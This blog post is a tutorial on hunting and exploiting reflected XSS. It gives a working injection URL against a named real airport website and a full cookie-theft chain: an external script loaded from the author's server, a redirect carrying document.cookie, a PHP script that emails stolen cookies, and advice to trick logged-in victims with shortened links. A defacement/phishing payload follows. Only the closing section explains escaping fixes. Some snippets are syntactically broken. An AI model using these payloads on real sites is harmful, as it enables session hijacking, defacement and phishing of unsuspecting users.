J2TEAM Security: A must-have extension for Chrome users. Install now!

Hunting for XSS Vulnerabilities

Hunting for XSS Vulnerabilities | Juno_okyo's Blog

Finding an xss’s vulnerable website is not very difficult.
In most cases can write in the search:

Code:
“><script>alert(‘try_xss’);</script>

This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.


Now we try to write:

Code:
“><script>alert(‘document.cookie’);</script> or
“><script>alert(document.cookie);</script>

If this xss works, we will see on the screen the alert within our cookies session of the site.


Or if he had not run the url just check and see how it is generated:

Example:

Last xss that I have discovered is on “aeroporto di Puglia” website:

http://www.seap-puglia.it/

if we try to find “><script>alert(‘try_xss’);</script> nothing happens.
But now look at the url:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=
%22%3E%3Cscript%3Ealert(‘try_xss’);%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0

we find the variable that makes it possible to search, in this case “strRicerca1″

Then apply the alert code directly after this variable:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&
strRicerca1=”><script>alert(‘try_xss’);</script>


We will magically witness the alert.

Now we try to write:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&str
Ricerca1=”><script>alert(document.cookie);</script>

Perfect! We see our cookie!

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim 

If we want include a file with javascript we can write:

Code:
“><script src=”http://www.googlebig.com/cookiescript.js”></script>

Inside the file “cookiescript.js” we write a code that displays the cookie and sends it by e-mail.

At this time we need to know the victim cookie and then comes in a “cookie grabbers”. Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim 

Howto include a javascript file:
Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>


Into cookiescript.js we will write a code that displays the cookie and sends it by email.

First of all we need to create a redirect to our site including the variable of cookies.

then:
Code:
<script>location.href="http://googlebig.com/cookie.php?cookie=</script>


Now we create cookie.php
Code:
<? mail("admin@googlebig.com","Here s the cookie stolen",$_GET['cookie']; ?>


Now upload cookie.php and cookiescript.js on our server and then go to:


Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca
1="><script src="http://www.googlebig.com/cookiescript.js"></script>


If everything works we will receiving cookie by email.

Now we send link to victim…we can send extended link or use a redirect service like http://www.tinyurl.com

Once created redirect, in this case http://tinyurl.com/2rgry5 , we can contact user, possibly through the same site to make sure that it open the link when it’s is logged on the site.

XSS THAT DOESN’T WORK

If a xss does not work and therefore do not have the chance of a redirect or not displaying cookies, it can be used as a phishing page.

An example of code is:
Code PHP:
var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here  ";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{ document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor; txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") { var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg); }
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD'; footer.innerHTML = title;
overLay.appendChild(footer);}



This code must be entered in this way:

Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>


In this way we will see javascript that we created.

Even in this case we can rely on tinyurl to mask our complete url and include directly redirect.
Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>

Another way to bring the victim on the page that we want is this:
Code:
http://[Sitevictim]/page.php?variable="><script>
location.href="http://www.googlebig.com/fakepage.htm</script>

For fixing the problem of cross site injection we have to use one of the 3 functions php.

These functions clean up the HTML tags, so is not possible inject into the code.

The function more used is htmlspecialchars() that transmutes all the characters “<” and “>” into “&lt;” and “&gt”.

Another option is htmlentities(), which replaces all the characters in the corresponding entities.
Code PHP:
<?
// This page shows an example
// of the differences in output between 2 functions
$input = '<script>alert(1);</script>';
echo htmlspecialchars($input) . '<br />';
echo htmlentities($input);
?>
An example of htmlentities()
Code PHP:
<?php
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
echo htmlentities($str, ENT_QUOTES);
?>

The first show –> A ‘quote’ is &lt;b&gt;bold&lt;/b&gt;
The second –> A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;
An example of htmlspecialchars()
Code PHP:
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new;
?>





This show –> &lt;a href=’test’&gt;Test&lt;/a&gt;
The funztion strip_tags(), instead, deletes all HTML elements, except certain elements that need to specify permitted such as <i>, <b> or <p>.
An example of strip_tags()
Code PHP:
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// allow <p>
echo strip_tags($text, '<p>');
?>

Now that we know at least that there are these functions, we will  apply into the code when we find a xss in our web application.

I  recently found an xss on a website in Video section of GoogleBig which is a plugin of Mybb forum, I have placed a piece of code to make the idea of how I had to apply the function to fix the search bug.

First of all I have found the php page in question: search.php

Now let’s look for the portion of code that makes available research, query and output the result of the query:


Code PHP:
function search($query, $page)
{
global $db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, $list_page_items, $hm_index;
$option = trim($option);
$query = trim($query);
$query = FixQuotes(nl2br(filter_text($query)));
$db->escape_string($query);
$db->escape_string($option);
alpha_search($query);
...


In this case the variable that passes the values is $query then we apply the function htmlentities():
Code PHP:
$query = FixQuotes(nl2br(filter_text(htmlentities($query))));



If you have problems you can comment here, or consult the manuals on these 3 php functions that we saw:

http://php.net/htmlentities
http://php.net/htmlspecialchars
http://php.net/strip_tags
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!